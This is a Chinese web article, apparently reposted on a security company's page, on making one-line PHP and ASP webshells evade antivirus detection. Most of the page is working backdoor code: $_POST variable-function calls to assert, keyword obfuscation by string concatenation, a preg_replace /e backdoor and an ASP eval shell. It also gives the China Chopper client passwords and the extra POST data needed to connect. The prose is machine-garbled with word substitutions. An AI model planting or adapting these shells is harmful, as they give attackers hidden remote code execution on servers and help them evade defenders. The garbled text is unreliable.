|
|
|
联系客服020-83701501

关于php一句话免杀的分析

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
对于php一句话免杀的阐发

一开始想如许:

<?php $_GET[‘ts7’]($_POST[‘cmd’]);?>
客户端用菜刀,密码cmd,url为test.php?ts7=assert

这个应当算没有甚么特征码了,可是弊病即是在网站日记中会裸露进去assert

可以都用post:

<?php $_POST[‘ts7’]($_POST[‘cmd’]);?>
在菜刀说明用<O>ts7=assert</O>post附加数据.

这两端思虑了这些:

<?php? $ts7 = (string)key($_POST);? $ts7($_POST[’assert’]);? ?>
忽然创举assert这个要害词又呈现了。。
既然字符串可以间接如许用,那还可以如许:

<?php? $a = “a”.”s”.”s”.”e”.”r”.”t”;? $a($_POST[“cmd”]);? ?>
大要用

$a = str_replace(x,””,axsxxsxexrxxt)
以上说来,感受

<?php $_POST[‘ts7’]($_POST[‘cmd’]);?>
算是最难查到的一种了。

==========================

ywisax 在论坛上又发了这个:
不知是谁写的 baidu了一堆 都没写出处,貌似是lcx写的:

asp版的,这是utf-8编码,本人看着弄吧

<”CODEPAGE=”65001″%>? <%? var lcx = {‘名字’: Request.form(‘#’), ‘性别’: eval, ‘春秋’: ‘18′, ‘昵称’: ‘请叫我一声老大’};? lcx.性别((lcx.名字)+”);? %>? 用冰狐就好了

<?php? ?@preg_replace(“/[email]/e”,$_POST[‘h’],”error”);?? ?>

菜刀附加数据:
<O>h=@eval($_POST

[c][/c]

);</O>

[email]和error你看着换吧,怎么潜伏怎么来
密码c

本文转自红黑联盟由网络安全攻防研讨室(www.91ri.org)消息安全小组收集收拾整顿。

数安新闻+更多

证书相关+更多